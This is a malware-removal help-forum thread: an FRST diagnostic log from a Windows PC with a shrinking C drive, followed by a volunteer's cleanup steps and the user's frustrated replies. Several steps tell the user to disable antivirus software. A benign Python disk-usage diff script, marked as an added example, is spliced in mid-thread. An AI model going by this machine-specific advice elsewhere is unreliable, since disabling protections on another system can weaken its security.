DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "RealTimes.lnk"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "InstallerLauncher"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "RealDownloader"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{48E95D83-9B8B-414B-A9A7-2AFD0BA50208}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{F82BB814-FD51-4987-A33F-250BD832B780}] => (Allow) LPort=2869
FirewallRules: [{819306FA-D122-44F5-A748-CC1307C44A50}] => (Allow) LPort=1900
FirewallRules: [{2CE914CC-1246-4A45-9164-021ADBEB0FA6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B4F92E4-BA5A-417A-9AB8-873D471F6AF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D8E0C8F5-5D2A-4C08-B909-61E4F0E4597A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5F135936-FF5E-4092-A1E2-3979F383BCA2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{39600119-24BB-49F0-9683-6C14A5BDE659}] => (Allow) C:\Users\Liljoe3493\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{80AD684B-DFE2-4317-A34A-372A855B9298}] => (Allow) C:\Users\Liljoe3493\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D158A772-4995-43F6-861D-531CBA1F2A6C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{6B3E0170-EF4A-4615-B7F7-1ED4C22198A4}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{38265C65-A41E-49B3-9DEA-039CF0ED162D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{B1F1BC02-998F-4770-B9EE-AD6912C18E1A}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{8842EB2E-6586-4654-BFC7-D9F3406E3DFD}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{8DAA89CF-365F-4128-9147-DECEBFFE46F9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{E249F174-19A3-4554-B6A9-1D7C43456542}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{F663A0B3-08AB-4FFF-862B-5003B4913D2F}] => (Allow) C:\Games\Outlast\Binaries\Win32\OLGame.exe
FirewallRules: [{EF7E6259-2266-4C8C-881A-A61444387BC5}] => (Allow) C:\Games\Outlast\Binaries\Win32\OLGame.exe
FirewallRules: [{0F319C39-45BE-4D8D-85F3-59AF18DEBE5C}] => (Allow) C:\Games\Outlast\Binaries\Win64\OLGame.exe
FirewallRules: [{FC5C78A2-2B51-4858-A7DE-C007C5461732}] => (Allow) C:\Games\Outlast\Binaries\Win64\OLGame.exe
FirewallRules: [{E62CFC47-A8BB-4CB4-9347-DD6AC5154D5B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB37B93D-133E-4EA1-9CC0-97801A9C33AB}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9032C82C-F7D8-408B-AD11-3218F737F945}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{86388C6B-A1E2-439B-86DB-0E76730966D1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{34D62A68-902A-4D27-8331-87B666381691}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{52D0E7B8-5AF1-492A-B45D-59BC934C50EB}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{0278734D-4D07-45FA-B8CB-9249B04B1B76}C:\games\outlast\binaries\win64\olgame.exe] => (Allow) C:\games\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{39DAA998-DF47-4BFF-968C-C65E753EC4CC}C:\games\outlast\binaries\win64\olgame.exe] => (Allow) C:\games\outlast\binaries\win64\olgame.exe
FirewallRules: [{7CFF04A5-2187-4171-87BC-E54B44C24F40}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [{BD2B6BA2-20B2-4908-820C-63D91CFA2072}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3049E11B-BA35-4F79-8E81-209E7F470A85}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{405C307D-4320-4110-8034-9EDE9F2E558C}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{6A05F313-82CA-4649-8069-BB5F2662B8A0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
04-01-2016 01:42:26 Removed XSplit Broadcaster
04-01-2016 01:44:40 Removed XSplit Broadcaster
04-01-2016 01:56:58 Removed XSplit Broadcaster
04-01-2016 02:22:56 Restore Operation
04-01-2016 10:22:03 Removed Mumble 1.2.10
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/04/2016 12:11:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Skype.exe version 7.17.0.105 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 6b24
 
Start Time: 01d1471a3d28f31c
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Skype\Phone\Skype.exe
 
Report Id: 98ad604c-b30e-11e5-82e2-3863bbc8f23e
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (01/04/2016 11:57:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LILJOETHEMASTER)
Description: Activation of app Microsoft.SkypeApp_kzf8qxf38zg5c!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/04/2016 11:57:50 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wwahost.exe version 6.3.9600.17415 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 6a94
 
Start Time: 01d147195ed008df
 
Termination Time: 4294967295
 
Application Path: C:\Windows\syswow64\wwahost.exe
 
Report Id: a67702a2-b30c-11e5-82e2-3863bbc8f23e
 
Faulting package full name: Microsoft.SkypeApp_3.1.0.1016_x86__kzf8qxf38zg5c
 
Faulting package-relative application ID: App
 
Error: (01/04/2016 11:57:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: LILJOETHEMASTER)
Description: App Microsoft.SkypeApp_3.1.0.1016_x86__kzf8qxf38zg5c+App did not launch within its allotted time.
 
Error: (01/04/2016 10:23:54 AM) (Source: MsiInstaller) (EventID: 10005) (User: LILJOETHEMASTER)
Description: Product: Mumble 1.2.10 -- The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is 2502. The arguments are: , ,
 
Error: (01/04/2016 10:23:54 AM) (Source: MsiInstaller) (EventID: 10005) (User: LILJOETHEMASTER)
Description: Product: Mumble 1.2.10 -- The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is 2503. The arguments are: , ,
 
Error: (01/04/2016 10:22:58 AM) (Source: VSS) (EventID: 12305) (User: )
Description: Volume Shadow Copy Service error: Volume/disk not connected or not found.
Error context: DeviceIoControl(\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - 0000000000000180,0x00530190,0000000000000000,0,00000055E572DB60,4096,[0]).
 
 
Operation:
   Query Shadow Copies
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddWin32ServiceFiles: Unable to back up image of service Avast Antivirus since QueryServiceConfig API failed
 
System Error:
The system cannot find the file specified.
.
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary avast! VM Monitor.
 
System Error:
The system cannot find the file specified.
.
 
Error: (01/04/2016 10:22:22 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary aswSP.
 
System Error:
The system cannot find the file specified.
.
 
 
System errors:
=============
Error: (01/04/2016 12:23:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The avast! HardwareID service failed to start due to the following error: 
%%2
 
Error: (01/04/2016 12:12:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The RealPlayer Update Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (01/04/2016 10:12:55 AM) (Source: DCOM) (EventID: 10001) (User: LILJOETHEMASTER)
Description: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Box.AppXcgnjqf89mss3ge7mq2mhqa303mzrmp23.mca31Box.AppX28dya9jxhxbtnky3mgebbjxma7fvws4j.mcaUnavailableUnavailable
 
Error: (01/04/2016 09:43:04 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Defender Service service failed to start due to the following error: 
%%577
 
Error: (01/04/2016 09:42:39 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Defender Network Inspection Service service failed to start due to the following error: 
%%577
 
Error: (01/04/2016 08:25:21 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068fdPHostUnavailable{D3DCB472-7261-43CE-924B-0704BD730D5F}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068fdPHostUnavailable{145B4335-FE2A-4927-A040-7C35AD3180EF}
 
Error: (01/04/2016 08:25:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068netprofmUnavailable{A47979D2-C419-11D9-A5B4-001185AD2B89}
 
Error: (01/04/2016 08:25:05 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
%%1068
 
 
CodeIntegrity:
===================================
  Date: 2016-01-04 09:43:04.863
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-04 09:42:39.749
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume4\Program Files\Windows Defender\NisSrv.exe that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-11-19 19:09:21.957
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-11-19 19:09:21.504
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-07-30 00:05:05.819
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-30 00:05:04.990
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:50:33.962
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:50:33.028
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:42:27.789
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2015-07-28 21:42:27.186
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2920 @ 1.86GHz
Percentage of memory in use: 62%
Total physical RAM: 3982.27 MB
Available physical RAM: 1504.93 MB
Total Virtual: 4686.27 MB
Available Virtual: 1716.65 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:907.68 GB) (Free:831.81 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22.81 GB) (Free:2.22 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 57DF2823)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#7 Liljoethemaster

Posted 04 January 2016 - 10:39 PM

And sorry for the mishap for what I have said. I somewhat had installed AVG PC Tuneup 3 months to test it out and got a somewhat decent program, but after that I was now dissatisfied, not only because I know already about the disk space eaten. And plus, yeah, I kind of did download AVG Secure Search, blatantly dumb for what I did, but yet to keep my searches safe. About the PC Tuneup, I did uninstall it, and if it was the case and ate my drive that way I didn't realize, but it is still kind of keeping on going for that reason. I did delete the folders and the program as well, but my drive was still decreasing.



#8 thcbytes

Posted 04 January 2016 - 10:58 PM

No worries.  :)
 
This next please....

FRST fix:

  • Download this file: fixlist.txt (14.27KB)

Note: It's important that both files, FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.

Please copy and paste the log in your next reply.

<<<<<<<<<<

I recommend the uninstalling of the below listed program(s).

  • Press the Windows key + R on your keyboard at the same time
  • Copy/paste appwiz.cpl into the run box and press Enter
  • A list of installed programs will be displayed
  • Uninstall the following by clicking on the program(s) below (and any other similar names) and selecting Remove or Uninstall

Ashampoo WinOptimizer 11 (HKLM-x32\...\{4209F371-8D72-8119-66FA-897D2D41E27F}_is1) (Version: 11.00.70 - Ashampoo GmbH & Co. KG)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 19.1.0.285 - AVG Technologies)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1204 - SUPERAntiSpyware.com)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc)

  • Reboot your computer

<<<<<<<<<<

Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed you will see Pending. Please check elements you don't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart

You can find the logfile at C:\AdwCleaner\AdwCleaner.txt

Copy and paste the contents in your reply



<<<<<<<<<<

Next please download Junkware Removal Tool and save it to your desktop.

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop

Copy and paste the contents in your reply

<<<<<<<<<<

Re-run FRST, check the Addition.txt box, press SCAN and copy/paste the 2 logs in your next reply.

<<<<<<<<<<

If the logs are too long you can post them over several posts or attach them.

<<<<<<<<<<

How is your computer running? What problems remain?

Regards,
thcbytes



#9 Liljoethemaster

Posted 11 January 2016 - 03:22 AM

Sorry for the late reply. I did some testing and I did the steps, how much I did, but every time I try to wait and see, my C drive is still decreasing. But here are the files and log on this recent date now. And again, sorry for the long wait, because 2 days ago AdwCleaner was not responding when I attempted to clean.

 




#10 thcbytes

Posted 11 January 2016 - 03:53 PM

Hello again, :)

This next please....

ESET Online Scanner
  • Click here to download the installer for ESET Online Scanner and save it to your Desktop.
  • Right click on esetsmartinstaller_enu.exe and select Run as Administrator.
  • Place a checkmark in YES, I accept the Terms of Use, then click Start. Wait for ESET Online Scanner to load its components.
  • Select Enable detection of potentially unwanted applications.
  • Click Advanced Settings, then place a checkmark in the following:
    • Remove found threats
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Click Start to begin scanning.
  • ESET Online Scanner will start downloading signatures and scan. Please be patient, as this scan can take quite some time.
  • When the scan is done, click List threats (only available if ESET Online Scanner found something).
  • Click Export, then save the file to your desktop.
  • Click Back, then Finish to exit ESET Online Scanner.
Next....

Please re-run and post WinDirStat for my review.

Regards,
thcbytes

#11 Liljoethemaster

Posted 12 January 2016 - 04:28 PM

The scan was too long and btw my other problems remain are my corrupt files with the Windows Resource Protection cause the restorehealth part of DISM with the scan that I'm doing is taking way too long. Along with the Windows updates randomly failing. But yeah here is my attachment I sent already about WinDirStat




#12 thcbytes

Posted 12 January 2016 - 04:36 PM

Hello,

> The scan was too long

Please clarify. Did you not allow the scan to finish?

<<<<<<<<<<

> But yeah here is my attachment I sent already about WinDirStat

I need a new WinDirStat to compare to the first time you ran it please. You tell me that your C:\ drive is decreasing. I want to see how much and where the files are allocated. Ok?

<<<<<<<<<<

> and btw my other problems remain are my corrupt files with the Windows Resource Protection cause the restorehealth part of DISM with the scan that I'm doing is taking way too long

Please clarify. What is taking way too long?

Regards,
thcbytes



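What comparing two runs amounts to when done as a script, as an added example that is not part of the original thread: it records per-folder totals on two dates and lists the folders that grew in between. The function names and the JSON snapshot format are assumptions made for this example.

```python
# Added example (not from the thread): diff two disk-usage snapshots.
import json
import os
import sys
from collections import defaultdict


def snapshot(root, depth=2):
    """Map each folder (rolled up to `depth` levels below root) to its bytes."""
    root = os.path.abspath(root)
    totals = defaultdict(int)
    # followlinks=False (the default) keeps symlinked folders from being walked;
    # unreadable folders are skipped instead of aborting the scan.
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        rel = os.path.relpath(dirpath, root)
        parts = [] if rel == "." else rel.split(os.sep)
        key = os.sep.join(parts[:depth]) or "."
        for name in files:
            try:
                totals[key] += os.lstat(os.path.join(dirpath, name)).st_size
            except OSError:
                continue  # file locked or deleted mid-scan
    return dict(totals)


def growth(before, after, min_bytes=1):
    """Return [(folder, delta_bytes)] for changed folders, biggest growth first."""
    deltas = []
    for key in set(before) | set(after):
        delta = after.get(key, 0) - before.get(key, 0)
        if abs(delta) >= min_bytes:
            deltas.append((key, delta))
    return sorted(deltas, key=lambda item: (-item[1], item[0]))


def save(snap, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snap, fh)


def load(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


if __name__ == "__main__":
    args = sys.argv[1:]
    if len(args) == 3 and args[0] == "snap":      # snap ROOT OUT.json
        save(snapshot(args[1]), args[2])
    elif len(args) == 3 and args[0] == "diff":    # diff OLD.json NEW.json
        for folder, delta in growth(load(args[1]), load(args[2]))[:20]:
            print(f"{delta / 2**20:+10.1f} MiB  {folder}")
    else:
        print("usage: snap ROOT OUT.json | diff OLD.json NEW.json")
```

Sizes are logical file sizes from folders the account can read; space held in areas it cannot read (for example System Volume Information) will not show up in the diff.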
#13 Liljoethemaster

Posted 12 January 2016 - 04:53 PM

Oh, that was the new one I gave, not the old. I just put in with the recovery drive in it. And btw the scan I'm doing on the command prompt was the C:\Windows\system32>Dism /Online /Cleanup-Image /RestoreHealth that scan I'm doing is taking way too long and it stops at 40%



#14 thcbytes

Posted 12 January 2016 - 05:51 PM

Hello,

I am still confused. Where are the ESET scan results?

<<<<<<<<<<

I didn't ask you to do this...

> btw the scan I'm doing on the command prompt was the C:\Windows\system32>Dism /Online /Cleanup-Image /RestoreHealth

Could you please hold off and only do as I ask for now?

<<<<<<<<<<

Please do this now...

Tweaking.com - Windows Repair All-In-One (Portable)

- Download Windows Repair All-In-One (Portable Version) from here.

- Extract tweaking.com_windows_repair_aio.zip to your Desktop.

- Disable all your antivirus and antimalware software - see how to do that here.
- Right click on the Windows Repair All-In-One program icon and select Run as Administrator (XP users just double click) to start Windows Repair All-In-One.
(Windows Vista/7/8 users: Accept UAC warning if it is enabled.)

- A window will appear. Click Step 2.

- Click the Open Pre-Scan button, then click Start Scan. Wait for Windows Repair to finish scanning.

- Depending on which error Windows Repair found, click Repair Reparse Point or Repair Environment Variable accordingly. When the button changes to "Done!", click the close button to return to Windows Repair.

- Go to Step 3, then click Check in the See If Check Disk Is Needed.

- If Windows Repair stated that errors are found, click Open Check Disk At Next Boot. Choose (/R) Fixes errors on the disk also locate bad sectors and recovers readable information, then click Add To Next Boot. Reboot the computer to let Windows check the disk.

- Go to Step 4, then click Do It.

- Go to Step 5. Under System Restore click Create.

- Go to Repairs and click Open Repairs. Leave all checkmarks as they are, then click Start Repairs.

- By default Windows Repair All-In-One will create a "Logs" folder in its folder on the Desktop. Please post the contents of the log in your next reply.

How is your computer running now?  Please answer my questions above.

Regards,
thcbytes



#15 Liljoethemaster

Posted 19 January 2016 - 06:07 AM

I'm so agitated and I still ain't got no luck with my C drive, and plus the two problems remaining are my installer error 2503 2502 and the C drive health.
And btw THC, even if I start and launch TweakingRepairs as I did, the pre-scan always gets to a message saying TweakingRepairs has stopped working, the same as AdwCleaner those days ago, and I ain't got no luck getting it to work and to run it as an administrator. And btw here are the scan results from ESET. I'm really getting antsy and friggin pissed as it is and I'm slowly losing my bleep mind.

 
